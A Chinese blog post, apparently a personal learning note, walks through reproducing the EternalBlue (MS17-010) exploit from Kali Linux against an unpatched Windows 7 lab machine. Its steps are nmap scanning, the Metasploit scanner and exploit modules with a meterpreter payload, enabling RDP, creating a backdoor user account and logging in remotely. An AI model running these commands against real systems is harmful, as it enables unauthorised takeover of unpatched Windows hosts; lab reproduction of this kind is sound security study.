kali linux学习(永恒之蓝)

最新推荐文章于 2024-05-16 16:52:25 发布
最新推荐文章于 2024-05-16 16:52:25 发布
阅读量6.4k 收藏 138
点赞数 15
分类专栏: kali 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43727668/article/details/106575127
版权

写在之前

永恒之蓝是2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

准备工作

pc:windows7(未安装补丁)和kali linux

寻找目标靶机

ifconig#查看本机的ip地址
nmap 192.168.1.0/24#扫描局域网内的其他主机

在这里插入图片描述
以ip为192.168.1.5的主机为靶机

使用msfconsole

msfconsole是一个强大的接口程序是一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。

msfconsole#进入msfconsole
use auxiliary/scanner/smb/smb_ms17_010#用来扫描漏洞
show option#查看需要设置的内容

在这里插入图片描述
yes的内容是需要设置的

set rhosts 192.168.1.5
run #执行进行扫描

在这里插入图片描述
在这里插入图片描述来自有道翻译

use exploit/windows/smb/ms17_010_eternalblue#调用永恒之蓝攻击模块
show option

在这里插入图片描述
有些内容已经填写,我们只需要填写靶机的ip地址和攻击方式

set rhost 192.168.1.5
set payload windows/x64/meterpreter/bind_tcp#设置攻击载荷
exploit#执行攻击

在这里插入图片描述

远程登录win7

 run post/windows/manage/enable_rdp #启动enable——rdp脚本
 run post/windows/manage/enable_rdp USERNAME=icbug   PASSWORD=123456#创建用户

在这里插入图片描述
重新创建一个终端

rdesktop 192.168.1.5

在这里插入图片描述
输入刚才创建的账号密码
在这里插入图片描述
至此,我们就通过永恒之蓝这个漏洞,登录到win7系统上了。

整个过程主要是学习了GitChat的博客,最后附上原文的连接:https://blog.csdn.net/valada/article/details/104190432?utm_medium=distribute.pc_relevant.none-task-blog-baidujs-4

莫伤心
关注
  • 15
    点赞
  • 138
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网安工程师教你Kali Linux:如何防御计算机永恒之蓝勒索病毒?
瓦罗兰特顶级C位的博客
12-30 504
网安工程师教你Kali Linux:如何防御计算机永恒之蓝勒索病毒?
使用Kali Linux Metasploit复现永恒之蓝
xujing19920814的博客
10-01 5272
使用Kali Linux Metasploit复现永恒之蓝
kali Linux——永恒之蓝复刻
最新发布
sparkleqs的博客
05-16 1918
Metasploit Framework 是一个功能强大的开源安全漏洞检测工具,用于编写、测试和使用 exploit 代码,广泛应用于渗透测试、shellcode 编写和漏洞研究。该框架主要采用面向对象的 Ruby 编程语言编写,并包含由 C 语言、汇编语言和 Python 编写的可选组件。最初的 Metasploit 是用 Perl 编写的,但在后来的版本中改为使用 Ruby 编写。
kali永恒之蓝使用流程(操作全套步骤)
m0_63028223的博客
04-01 5088
kali永恒之蓝使用流程
【网络安全】用永恒之蓝(Eternal blue)测试windows系统的安全性
茗染云华 荆挑赋樱
11-30 1483
③metasploit 攻击 windows操作系统:如永恒之蓝漏洞,利用windows操作系统的SMB漏洞可以获取系统最高权限,端口为445。②metasploit:kali最强渗透工具。二、kali、metasploit、metasploit 攻击 windows操作系统、metasploit 攻击 永恒之蓝 全流程。②在攻击机的终端,攻击目标地址,使用命令:set RHOSTS 具体目标地址或网段。target port=rport=目标的端口(永恒之蓝漏洞的默认端口=445)
kali上使用msf渗透win7(永恒之蓝操作复现)初学者指南
weixin_45596770的博客
04-18 1万+
首先开篇先放出我使用的kali 与 win7 的网盘链接: 大家VMware上新建虚拟机即可~ 简单介绍一个Metasploit,一个免费的、开源的渗透测试框架,kali上可以直接使用~ 1. Metasploit初始化 在使用之前我们需要对Metasploit进行初始化,并启动: 终端窗口的命令行输入如下命令 systemctl start postgresql systemctl enable postgresql 启动专用的数据库,并设置为每次开机自动启动 msfconsole 或者 点击kali
kali入门到入狱之 永恒之蓝(MS17-010)复现.
网络安全领域___专研者.
03-15 3475
利用永恒之蓝(MS17-010)拿到电脑win7(32位)权限(包含:开关键盘/鼠标,文件上传,开启的远程桌面,使用摄像头拍照,重新启动计算机,关闭防护软件,取消户登录,电脑蓝屏等等......)
永恒之蓝测试.docx
07-23
在这篇文章中,我们将详细介绍 Kali Linux 中的永恒之蓝测试步骤,适合新手观看。永恒之蓝是 Windows 操作系统中的一个漏洞,通过这个漏洞,可以远程控制目标主机。 Nmap 扫描 首先,我们需要使用 Nmap 工具来扫描...
永恒之蓝漏洞演示
12-22
利用kali linux在windows7上演示永恒之蓝漏洞,有kali实战经验的可以看懂
永恒之蓝配置Windows7
10-24
本文将讲解如何使用 Kali Linux 中的 MSF-Metasploit 来利用永恒之蓝漏洞入侵 Windows7 系统。 一、准备工作 在开始之前,我们需要准备好攻击机和靶机。攻击机使用 Kali Linux 操作系统,IP 地址为 192.168.1.10,...
渗透基础笔记+作业(永恒之蓝复现)
09-08
复现环境通常包括攻击机(如Kali Linux)和靶机(如Windows 7)。工具如Nmap用于网络扫描,Metasploit则作为渗透框架,利用已知漏洞进行攻击。在复现过程中,测试者会模拟攻击流程,以理解漏洞的利用方式和防范措施...
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
Kali:永恒之蓝(最基础的攻击指令)
2201_75638644的博客
03-10 481
Kali中利用永痕之蓝漏洞实现最基本对目标靶机的攻击。
Kali Linux下利用永恒之蓝漏洞发起攻击获取Shell
热门推荐
时光途径
06-06 1万+
Material:        Computer         VMware 12        Kali Linux.ISO        InternetFirst:    Open Your Computer and VMware:Second Open Your SSH Connection Tools, Eg Securt CRT,Putty.......Input Msfconso...
linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)
weixin_28829479的博客
05-16 436
永恒之蓝漏洞复现(ms17-010)漏洞描述:Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。影响版本:目前已知受影响的Windows 版本包括但不限于:WindowsNT,Win...
kali-linux-2021.2默认用户名密码
web18536560468的博客
09-07 5704
背景:在virtualbox中导入kali-linux-2021.2-virtualbox-amd64.ova后启动,发现需要输入用户名密码,但是导入镜像环境并没有设置用户名密码的环节。解决方案:尝试用kali/kali登录,成功啦,也就是kali设置的默认用户名密码为: kali/kali
Kali Linux:用永恒之蓝对 Windows 7 进行渗透并揭密勒索病毒攻击方法
GitChat
02-05 5679
提示:本文章内所有内容环境为自己搭建绝无违法内容,请不要利用其中的技术来做违法的事情。 声明:法律问题与本作者无关,请自觉遵守! 实施利用 Kali Linux 对 Windows7 SP1 进行永恒之蓝操作,所以操作将在虚拟机上完成。...
网络安全与Kali Linux:利用MSF对Win7进行永恒之蓝攻防演练实战
Kali与编程
09-11 1483
课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali与编程,学习更多网络攻防干货! 基础知识介绍: 1.何为永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病
kali linux学习
m0_73271597的博客
10-04 1041
(第四十六课)OpenVAS报告 报告是你工作中最重要的一环。相关工作完成后,但是漏洞扫描程序提供的报告将有助于你了解从哪里开始人手。当我们开始查看漏洞扫描程序报告时,有两件事需要注意。首先,漏洞扫描程序使用特定签名来确定是否存在漏洞。这可能类似于抓取标题来比较版本号。你无法确定该漏洞是否存在,因为OpenVAS等工具不会进行漏洞利用。其次,与之相关的是你可能会得到某些误报。由于漏洞扫描程序未利用此漏洞,因此最好的情况是漏洞获取的概率。 如果你没有使用凭据执行扫描,那么将错过检测很多漏洞。你也许会有更高
kali永恒之蓝漏洞渗透
09-05
Kali Linux中,可以使用一些工具来进行永恒之蓝漏洞的渗透测试。 首先,使用auxiliary/scanner/smb/smb_ms17_010模块进行扫描目标主机,以确定是否存在漏洞。如果扫描结果显示存在漏洞,可以进一步使用exploit/...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值